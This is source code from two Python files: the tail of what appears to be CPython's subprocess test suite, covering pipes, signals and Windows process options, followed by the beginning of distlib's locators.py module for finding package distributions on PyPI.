stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
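# Rationale (informal): a child can exit and close its end of the stdin
# pipe before communicate() finishes writing to or closing ours; the
# resulting BrokenPipeError carries no useful information at that point,
# so communicate() swallows it, as the four tests above pin down for
# write(), flush() and close() on both code paths.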
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
pid, status = os.waitpid(proc.pid, 0)
self.assertEqual(pid, proc.pid)
self.assertTrue(os.WIFEXITED(status), status)
self.assertEqual(os.WEXITSTATUS(status), 0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test already consumed the exit
# status via waitpid(), so Popen could not read it and falls back to a
# default returncode instead.
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USESHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces(BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
locators.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
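# Editor's sketch (not part of the original module): typical use of the helper
# above; this performs network I/O against the default index and may be slow.
def _example_list_distribution_names():  # pragma: no cover
    names = get_all_distribution_names()
    return sorted(names)[:10]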
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except queue.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give a URL a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename into project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if is_compatible(wheel, self.wheel_tags):
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
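    # Editor's note (illustrative, not in the original): for an sdist URL such
    # as 'https://example.com/packages/foo-1.0.tar.gz' this returns a dict of
    # the form {'name': 'foo', 'version': '1.0', 'filename': 'foo-1.0.tar.gz',
    # 'url': '...'}, plus an '<algo>_digest' key when the fragment carries one.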
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
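# Editor's sketch (not in the original): a locator's get_project() returns a
# dict mapping version strings to Distribution objects plus the bookkeeping
# keys 'urls' and 'digests'; this helper filters those out (names illustrative).
def _example_versions_only(locator, name):  # pragma: no cover
    versions = locator.get_project(name)
    return {k: v for k, v in versions.items() if k not in ('urls', 'digests')}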
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
